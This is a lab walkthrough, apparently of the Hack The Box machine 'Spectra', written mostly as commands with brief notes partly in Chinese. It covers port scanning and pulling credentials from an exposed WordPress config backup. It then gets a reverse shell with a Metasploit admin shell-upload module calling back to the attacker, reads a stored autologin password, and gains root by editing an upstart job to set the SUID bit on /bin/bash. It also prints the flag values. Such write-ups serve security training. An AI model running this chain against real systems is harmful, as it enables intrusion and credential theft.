Information Gathering

$ ip='10.10.10.229'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|_  4096 5247de5c374f290e8e1d886ef9234d5a (RSA)
80/tcp   open  http    nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open  mysql?

Path Traversal && Wordpress Plugins Reverse Shell

# echo '10.10.10.229 spectra.htb'>>/etc/hosts

$ curl http://spectra.htb/testing/wp-config.php.save

username:devtest
password:devteam01

http://spectra.htb/main/

http://spectra.htb/main/wp-login.php

username:administrator

use exploit/unix/webapp/wp_admin_shell_upload
set USERNAME administrator
set RHOSTS 10.10.10.229
set TARGETURI /main
set LHOST tun0
set PASSWORD devteam01
run

$ cat /etc/autologin/passwd

SummerHereWeCome!!

$ ssh katie@10.10.10.229

User.txt

e89d27fe195e9114ffa72ba8913a6130

Privilege Escalation:initctl

$ scp katie@10.10.10.229:/sbin/initctl ./

initctl 是一个用于管理系统初始化进程的命令，它通常用于系统的启动、停止、重启和管理系统服务等操作

$ cd /etc/init

列出服务状态

$ sudo -u root /sbin/initctl list | grep test

$ sudo -u root /sbin/initctl stop test

description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown

script
    chmod +s /bin/bash
end script

$ sudo -u root /sbin/initctl start test

$ /bin/bash -p

Root.txt

d44519713b889d5e1f9e536d0c6df2fc